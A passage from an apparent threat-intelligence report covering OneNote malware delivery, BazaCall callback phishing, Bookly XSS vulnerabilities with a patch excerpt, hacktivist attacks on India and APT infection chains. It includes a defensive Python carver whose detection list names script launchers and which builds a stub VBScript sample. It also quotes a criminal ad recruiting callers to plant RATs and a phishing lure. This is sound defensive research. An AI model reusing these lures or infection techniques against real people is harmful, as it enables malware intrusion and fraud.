In the case of the QBot campaign, the OneNote file contains obfuscated ".hta" files that download DLLs. Conversely, in the Emotet campaign, the infection chain is different: the OneNote file contains obfuscated VBScript with a ".wsf" file extension, hidden from end users. This file, in turn, downloads the Emotet DLL from a compromised website. This attack methodology poses a high level of criticality, especially given the widespread use of OneNote globally. Users are urged to exercise caution, particularly when receiving unexpected documents or files through email or messaging platforms, to mitigate the risk of falling victim to this threat.
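Because the attachments described above (VBS, HTA, WSF and batch scripts) are stored inside the .one file as embedded file objects, mail gateways and analysts can carve them out without opening OneNote. The following added example does that carving and classifies each embedded blob; it is not the report's tooling. The object layout (header GUID, 8-byte length, 12 reserved bytes, data, footer GUID) is taken from the FileDataStoreObject structure in Microsoft's [MS-ONESTORE] specification, the content markers are assumed triage heuristics, and the sample section bytes are constructed rather than taken from a real notebook.

```python
"""Carve embedded file objects out of a OneNote section and flag script-type attachments."""
import struct
import uuid
from typing import Optional

# FileDataStoreObject guidHeader / guidFooter from [MS-ONESTORE], stored little-endian.
FILE_DATA_HEADER = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le
FILE_DATA_FOOTER = uuid.UUID("71FBA722-0F79-4A0B-BB13-899256426B24").bytes_le
HEADER_LEN = 16 + 8 + 4 + 8          # guidHeader, cbLength, unused, reserved

# Assumed content signatures marking an embedded object as a script or executable.
SCRIPT_MARKERS = (
    (b"<script", "HTA/VBScript"),
    (b"<job", "WSF script"),
    (b"wscript", "WSH script"),
    (b"@echo off", "batch"),
    (b"powershell", "PowerShell launcher"),
)


def carve(data: bytes) -> list:
    """Return every FileData blob found in the section, in file order."""
    blobs, pos = [], 0
    while True:
        pos = data.find(FILE_DATA_HEADER, pos)
        if pos < 0:
            return blobs
        (cb_length,) = struct.unpack_from("<Q", data, pos + 16)
        start = pos + HEADER_LEN
        end = start + cb_length
        if end > len(data):              # truncated object: stop carving
            return blobs
        blobs.append(data[start:end])
        pos = end


def classify(blob: bytes) -> Optional[str]:
    """Label a blob as a script/executable type, or None for documents, images, etc."""
    head = blob[:4096]
    if head.startswith(b"MZ"):
        return "PE executable"
    low = head.lower()
    for marker, label in SCRIPT_MARKERS:
        if marker in low:
            return label
    return None


def triage(data: bytes) -> list:
    """One record per embedded object: index, size in bytes and classification."""
    return [{"index": i, "size": len(b), "kind": classify(b)}
            for i, b in enumerate(carve(data))]


def build_file_data_object(payload: bytes) -> bytes:
    """Serialise one FileDataStoreObject (used here only to construct the sample)."""
    return (FILE_DATA_HEADER + struct.pack("<Q", len(payload)) + b"\0" * 12
            + payload + FILE_DATA_FOOTER)


# Constructed section: filler bytes, an embedded PNG-like image, then an embedded
# VBScript-in-HTA attachment of the kind the report describes.
SAMPLE_SECTION = (
    b"\0" * 64
    + build_file_data_object(b"\x89PNG\r\n\x1a\n" + b"\0" * 32)
    + b"\0" * 16
    + build_file_data_object(
        b'<script language="VBScript">\r\nSet s = CreateObject("WScript.Shell")\r\n</script>')
)

if __name__ == "__main__":
    for rec in triage(SAMPLE_SECTION):
        print("object %(index)d: %(size)d bytes, kind=%(kind)s" % rec)
```

A blob whose classification is not None should be quarantined for sandbox analysis; the image-type objects are the notebook's normal content.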
  • 56. The Surge of BazaCall and Caller-Driven Malware Attacks
BazaCall has emerged as a potent technique since 2021, employing phone calls to entice targets into clicking malicious links and unknowingly installing malware.
Modus Operandi: Phishing emails with provided phone numbers lure victims into making calls, where operators convince them to grant remote access. Simultaneously, network operators exploit this access to clandestinely install backdoors. Affiliated ransomware groups leverage this method, recruiting callers proficient in multiple languages for vishing campaigns using "callback phishing". Evolving BazaCall tactics have seen the deployment of notorious malware strains like BazarLoader, Trickbot, and IcedID, with a focus on the US, Canada, and select Asian countries. Underground forums witness a growing demand for individuals skilled in caller-based techniques. Some operators, working on bulk orders, strategically utilize toll-free numbers to avoid SIM blocking, underscoring the adaptability of this malicious approach.
Corporate Implications: Corporate entities must be alert to the rising threat of caller-based services, recognizing them as a new vector for malware infiltration.
  • 57. Threat actor seeking caller services
"I am looking for Callers for Ratting Mobile Carrier Store PCs, Namely USA and UK Countries. Candidate must be Fluent in English and have Prior Experience in this Profession as well as must be Good in Social Engineering. You will be Provided Direct Link to the RAT Stub .exe File which You should be able to Convince the Store Employees to Download the File and Execute it. Monetary Compensation can be Discussed and Agreed upon. Interested Candidates can Contact me on my Telegram. Also I am open to work with People who are into sim-swapping, Ratting Mobile Store PCs, etc. I have FUD RAT Stubs and looking for People who can RAT Mobile Carrier Store PCs. Profit will be Shared among us 50/50."
Affiliates of threat actors reaching out to targets
"Hello, We received an inquiry concerning an invoice correct? I was unable to locate your account with the information you sent out. Could you send over the phone number or email address attached to the account so that we can look into it for you?"
Spam mail randomization (observed subject lines): "Health Policy: soft copy", "Insurance Database is Updated", "invoice"
Phishing Hit Count for Year 2023 (number of attacks per month)
Oct 2022 | 60029
Nov 2022 | 35375
Dec 2022 | 20135
Jan 2023 | 19139
Feb 2023 | 34337
Mar 2023 | 25881
Apr 2023 | 34169
May 2023 | 17416
June 2023 | 27852
July 2023 | 28992
Aug 2023 | 17742
Sept 2023 | 16744
Oct 2023 | 16395
  • 58. WordPress Bookly Plugin Vulnerability: CVE-2023-1172 and CVE-2023-1159
The "WordPress Online Booking and Scheduling Plugin – Bookly" is used by over 60,000 websites. Bookly streamlines online bookings and automates the reservation process. However, like many other WordPress plugins, it is vulnerable to exploitation by attackers. It allows unauthenticated attackers to inject malicious scripts, potentially compromising a site owner's entire site when they access the calendar tooltip from the plugin.
In March 2023, SEQRITE Labs uncovered two security vulnerabilities in the Bookly plugin for WordPress impacting users worldwide. The first vulnerability, CVE-2023-1172, is a high-severity Cross-Site Scripting flaw resulting from inadequate input sanitization and output escaping of the full name value. Unauthenticated attackers can exploit this, injecting arbitrary web scripts into pages that execute on every user visit, posing a significant risk.
The second vulnerability, CVE-2023-1159, classified as medium severity, is a Cross-Site Scripting issue stemming from insufficient input sanitization and output escaping in the 'Service Title' field. Authenticated attackers with administrative privileges can leverage this vulnerability in multisite installations or where the "unfiltered_html" capability is disabled. They can insert web scripts into pages, which execute when users access the affected pages. Both vulnerabilities have a global reach, with CVE-2023-1172 being of higher severity, emphasizing the critical need for users to address these security concerns promptly.
Research discovered that the Bookly plugin's "Full name" field was vulnerable to stored cross-site scripting (XSS) attacks. The plugin reuses the user's "Full name" input in multiple files, significantly increasing the risk of security breaches if the input is not properly sanitized and escaped to prevent malicious code injection. The vulnerability has been fully resolved in plugin version 21.5.1. It is strongly recommended that WordPress site owners update their site to the latest patched version of the plugin (version 21.6 at the time of writing) to prevent potential attacks.
Criticality: High
Sectors Targeted: All
Countries Affected: Worldwide
  • 59. RESOLVING THE ISSUE: A LOOK AT THE PATCH
Before the fix, the substituted value was passed through unchanged:
    return self::stringify( self::tokenize( $text ), $codes, $bold, $exclude );
    public static function stringify( $tokens, $codes, $bold, $exclude = array() )
    $data = self::get( $token[1], $codes );
After the fix, an $escape flag is threaded through the call and the value is stripped of tags before use:
    return self::stringify( self::tokenize( $text ), $codes, $bold, $exclude, $escape );
     * @param bool $escape
    public static function stringify( $tokens, $codes, $bold, $exclude = array(), $escape = false )
    $code = self::get( $token[1], $codes );
    $data = $escape ? strip_tags( $code ) : $code;
  • 60. Multiple Hacktivist groups target India during the G20 Summit
Hacktivist groups from neighbouring countries had announced plans to attack websites of private and public entities in India during the G20 Summit. More than 30 hacktivist groups targeted 600+ government and private entities through DDoS attacks, defacements, and data leaks. The most targeted sector was government, followed by finance, technology, public, and education. Similar coordinated attacks are anticipated next year during India's General Elections, the Paris Olympics, etc.
Daily Attacks Timeline (dates indicating the rise in number of attacks during the G20 Summit)
Date | Number of Attacks
08/09/2023 | 54
09/09/2023 | 152
10/09/2023 | 213
  • 61. [Chart: Attacks by Top 10 Hacktivists, number of attacks per hacktivist organisation. Groups named on the axis: BlackShinchan, XXX, CyberErrorSystem, JatengCyberTeam, JaringSG, CyberRegiment, RootTeam, HacktivistIndonesia, GanosecTeam, TeamInsanepk, HizbullahCyberTeam; bar values shown: 4, 4, 6, 7, 15, 16, 22, 43, 75, 176]
  • 62. Decoding the Dynamics of Advanced Persistent Threats
Advanced Persistent Threat (APT) groups stand out due to their sophisticated techniques and specific targets. This section outlines key details about prevalent APTs, expanding on their tactics and targets.
SideCopy: Initiating Complex Chains of Infection
Description: SideCopy distinguishes itself by distributing its own malware. The group employs a nuanced approach, often initiating attacks through malicious LNK files. These files set off a sophisticated chain of infection, leveraging multiple HTAs and loader DLLs, ultimately culminating in the deployment of the final payloads.
Target: SideCopy primarily targets the Telecom, Power, and Finance sectors, showcasing a strategic focus on critical infrastructure and financial entities.
Transparent Tribe: Evolving Scope and Strategic Campaigns
Description: Transparent Tribe is an APT group traditionally concentrated on the Indian defence ecosystem. However, it is now also targeting educational institutions and students in the Indian subcontinent. The group's malware arsenal includes the Crimson RAT, a consistent tool in its campaigns.
Target: Transparent Tribe has its sights on national information assets, showcasing a multifaceted approach that encompasses government and critical infrastructure entities.
RedFoxtrot: A Prolific Actor in Asian Cyber Espionage
Description: RedFoxtrot, active since at least 2014, specializes in targeting government and telecom sectors across Asian countries.
Target: RedFoxtrot predominantly focuses on Defence Institutes and the Telecom Sector, aligning its activities with geopolitical developments.
  • 63. [Figure: Depicting SideCopy - Infection chain-1 with the same IP: phishing shortcut, stager HTA, preBotHta run in memory, Ares RAT, decoy document downloaded as PDF; same name, different payloads across April, May, August and October]
[Figure: Depicting SideCopy - Infection chain-2 with IP sharing with domains and C2: phishing shortcut and CVE-2023-38831 archive, stager HTA, DLL run in memory, DRat, AllaKore RAT and Ares RAT, decoys as PDF (DocScanner_Aug_2023, DocScanner_Oct); similar naming across August and October]
  • 64. [Figure: Depicting SideCopy: Double Action, Triple Infection, and a New RAT. Three RAR archives carry shortcuts disguised as DOCX, PNG and PDF; each launches a remote HTA (stage-1) that runs preBotHta.dll in memory, drops decoy files, side-loads Action RAT (DUser.dll) through a copied credwiz.exe, and sets persistence under %Public% and the Startup folder; further HTA stages (stage-2, stage-3) lead to a second Action RAT instance, with C2 over ports 8080, 9813 and 9467]